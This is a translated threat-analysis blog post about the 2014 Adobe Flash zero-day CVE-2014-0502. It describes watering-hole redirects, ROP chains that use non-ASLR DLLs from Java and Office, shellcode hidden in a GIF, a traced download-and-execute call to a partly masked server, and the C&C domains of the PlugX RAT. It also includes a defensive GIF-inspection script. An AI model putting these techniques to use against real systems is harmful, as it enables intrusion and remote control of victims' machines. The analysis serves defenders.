Attack behavior analysis using Adobe 0day-CVE-2014-0502

Source: Internet
Author: User

Recently, FireEye published a report on a new 0-day attack using Adobe Flash, and Adobe has released a security update for the vulnerability.

According to FireEye, a number of websites, including the following, redirect visitors to a malicious server hosting the exploit:

Peterson Institute for International Economics

American Research Center in Egypt

Smith Richardson Foundation

The malicious Flash file is hosted at http://4.59.XXX.XX/common/cc.swf

The Flash contains some interesting debug symbols:

C:\Users07\Desktop\FlashExp(ie)\src\cc.as

The ActionScript code in the Flash file determines the operating system version and selects hard-coded ROP chains to bypass ASLR.

For Windows XP, the code first checks the system language. ROP chains are included only for the following two languages:

English and Chinese

In this case (Windows XP), the ROP chain uses a well-known technique built on gadgets from msvcrt.dll.

If the system is running Windows 7:

- Check whether Java 1.6 or Java 1.7 is installed on the system.

- If Java 1.6 is installed, the code uses a ROP chain in msvcr71.dll, which ships with Java 1.6. This DLL is not protected by ASLR.

- Check whether Microsoft Office 2007 or 2010 is installed.

- If so, use a ROP chain in hxds.dll, which ships with Microsoft Office 2007/2010. This DLL is not protected by ASLR.

To load hxds.dll, the exploit uses the common trick of invoking the ms-help: protocol handler (location.href = 'ms-help:'), as seen in other exploits of this type:

The following code downloads a GIF file:

The downloaded file looks like a normal image:

However, the image contains shellcode at offset 3344. The shellcode downloads a PE32 file from the same server and runs it:

Hiding shellcode in an image is a clever trick, because it can evade the monitoring of many network security products.
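A defender-side check for the trick described above, added here as an example and not part of the original post or the FireEye report: it walks the GIF block structure and reports bytes that sit after the trailer or inside opaque comment/application extensions, the two places a structurally valid image can carry a payload. The sample GIF and the bytes appended to it are constructed; the post's offset of 3344 is not reproduced.

```python
import struct

# Constructed sample: a minimal 1x1 GIF89a (no colour table) and a copy with
# 16 opaque bytes appended after the trailer, standing in for a hidden payload.
CLEAN_GIF = (b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0, 0, 0)
             + b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
             + b"\x02\x02\x44\x01\x00" + b"\x3b")
SUSPECT_GIF = CLEAN_GIF + bytes(range(0x90, 0xA0))  # constructed, not real shellcode

def _skip_subblocks(data, pos):
    """Advance past a chain of length-prefixed sub-blocks; return (new_pos, bytes_seen)."""
    seen = 0
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return pos, seen
        pos += n
        seen += n

def inspect_gif(data):
    """Walk the GIF block structure up to the trailer (0x3B).
    Returns trailer_end, overlay_bytes (data after the trailer, which a viewer
    ignores) and extension_bytes (opaque comment/application extension payload)."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF header")
    _w, _h, flags, _bg, _aspect = struct.unpack_from("<HHBBB", data, 6)
    pos = 13
    if flags & 0x80:                       # global colour table present
        pos += 3 * (2 << (flags & 0x07))
    ext_bytes = 0
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                  # trailer: everything after it is overlay
            return {"trailer_end": pos, "overlay_bytes": len(data) - pos,
                    "extension_bytes": ext_bytes}
        if block == 0x2C:                  # image descriptor
            *_, iflags = struct.unpack_from("<HHHHB", data, pos)
            pos += 9
            if iflags & 0x80:              # local colour table
                pos += 3 * (2 << (iflags & 0x07))
            pos += 1                       # LZW minimum code size
            pos, _ = _skip_subblocks(data, pos)
        elif block == 0x21:                # extension: 1-byte label, then sub-blocks
            label = data[pos]
            pos += 1
            pos, n = _skip_subblocks(data, pos)
            if label in (0xFE, 0xFF):      # comment / application extension
                ext_bytes += n
        else:
            raise ValueError("unexpected block 0x%02x at offset %d" % (block, pos - 1))
    raise ValueError("no trailer found (truncated or malformed GIF)")
```

A non-zero overlay or a large extension payload on a file served as an image is worth carving and scanning, since the image itself renders normally either way.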

The shellcode uses the following API calls to download and execute the PE32 file:

    LoadLibraryA(wininet)
    LoadLibraryA(user32)
    VirtualProtect(adr=404bf1, sz=4, flags=40)
    SetUnhandledExceptionFilter(0)
    VirtualProtect(adr=7c81cdda, sz=82, flags=40)
    VirtualProtect(adr=7c81cdda, sz=82, flags=0)
    SetUnhandledExceptionFilter(7c81cdda)
    GetTempPath(len=104, buf=12fca4) = 14
    GetTempFileName(path=C:\users\jaime\Temp\, prefix=0, unique=0, buf=12fca4) = 245D
    Path = C:\users\jaime\Temp\245d.tmp
    InternetOpenA()
    InternetOpenUrlA(http://4.59.XX.XX/common/update.exe)
    CreateFileA(C:\users\jaime\Temp\245d.tmp) = 4
    InternetReadFile(1, buf: 12fbe8, size:64)
    InternetCloseHandle(1) = 1
    InternetCloseHandle(1) = 1
    CloseHandle(4)

The payload used in this attack is the well-known remote control program PlugX RAT. I have mentioned it several times in previous blog posts:

Tracking down the author of the PlugX RAT

The connection between the PlugX Chinese gang and the latest Internet Explorer Zeroday

New versions of the IExplorer ZeroDay emerge targeting Defense and Industrial companies

The malicious program copies itself to \AllUsers\DRM\RasTls\RasTls.exe and creates the following mutexes during execution:


The PlugX sample contains three different command-and-control (C&C) addresses:

    00903474 -> java[.]ns1[.]name
    009034B8 -> adservice[.]no-ip[.]org
    009034FC -> wmi[.]ns01[.]us

It communicates with the C&C server over HTTP:


Note that the C&C domain names were maliciously constructed:

By now I should not need to remind you to update the vulnerable Adobe, Java and Office versions as soon as possible, since they can be used to bypass ASLR.

Have a good time!

[Translated from alienvault]
